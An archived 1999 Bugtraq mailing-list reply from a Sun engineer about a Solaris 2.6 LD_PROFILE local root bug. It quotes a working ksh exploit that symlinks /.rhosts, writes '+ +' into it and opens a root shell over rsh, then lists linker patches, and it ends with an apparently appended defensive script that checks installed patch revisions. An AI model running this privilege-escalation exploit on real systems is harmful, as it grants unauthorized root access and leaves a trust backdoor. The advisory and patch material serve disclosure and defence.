Bugtraq mailing list archives

Re: LD_PROFILE local root exploit for solaris 2.6


From: casper () HOLLAND SUN COM (Casper Dik)
Date: Fri, 24 Sep 1999 10:30:32 +0200


works on solaris 2.6 sparc anyway...

#! /bin/ksh
#  LD_PROFILE local root exploit for solaris
#  steve () tightrope demon co uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + >  /.rhosts
rsh -l root localhost csh -i

This is bug 4150646 (or rather, 1241843, which resurfaced after an
extensive rewrite of the dynamic linker).

It's been fixed in Solaris 7 and with the following patches in other
releases:

103242-07: SunOS 5.5: linker patch
103243-07: SunOS 5.5_x86: linker patch
103627-11: SunOS 5.5.1: Linker patch
103628-10: SunOS 5.5.1_x86: Linker patch
105490-07: SunOS 5.6: linker patch
105491-05: SunOS 5.6_x86: linker patch

The bug was originally fixed in 5.5.1 and back patched; I rediscovered that
it was back in 2.6 (which also meant it was in the process of being patched
back into 5.5/5.5.1, but I think those patches were held up until the
regression was fixed); this was all well before S7 was released.

The original bug was also fixed in the following patches:

102049-05: SunOS 5.4: linker fixes
102303-05: SunOS 5.4: POINT PATCH: linker fixes
102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes
102778-03: SunOS 5.4_x86: linker patch

Casper
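As an added example (not Casper's or Sun's code), a small POSIX shell check that parses `showrev -p` output for the patch revisions listed above; the `Patch: ID Obsoletes: ... Packages: ...` line format and the sample listing are assumptions, and the listing is constructed rather than captured from a real host.

```shell
#!/bin/sh
# Added example, not part of the original post: verify that a linker patch from
# Casper's list is installed at the required revision or newer, by parsing
# `showrev -p`. Assumed line format (Solaris 2.x):
#   Patch: 105490-07 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu
# The listing below is constructed sample data, not output from a real host.

SAMPLE_SHOWREV='Patch: 105181-05 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu
Patch: 105490-04 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu, SUNWarc
Patch: 105568-02 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu'

# highest_rev BASE LISTING: print the highest installed revision of patch BASE,
# or nothing if the patch is absent (a host may carry several revisions).
highest_rev() {
    printf '%s\n' "$2" | awk -v base="$1" '
        $1 == "Patch:" { split($2, p, "-"); rev = p[2] + 0
                         if (p[1] == base && rev > max) max = rev }
        END { if (max > 0) print max }'
}

# patch_ok ID LISTING: succeed when patch ID (e.g. 105490-07) is installed at
# that revision or a newer one.
patch_ok() {
    base=${1%-*}
    need=$(printf '%s' "${1#*-}" | sed 's/^0*\([0-9]\)/\1/')   # "07" -> 7
    have=$(highest_rev "$base" "$2")
    [ -n "$have" ] && [ "$have" -ge "$need" ]
}

# report IDS LISTING: one line per required patch ID, "ok" or "MISSING".
report() {
    for id in $1; do
        if patch_ok "$id" "$2"; then echo "$id ok"; else echo "$id MISSING"; fi
    done
}

# On a live Solaris 2.6 sparc host you would pass "$(showrev -p)" instead of the
# sample. Here only 105490-04 is installed, so the required -07 is reported missing.
report "105490-07" "$SAMPLE_SHOWREV"
```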

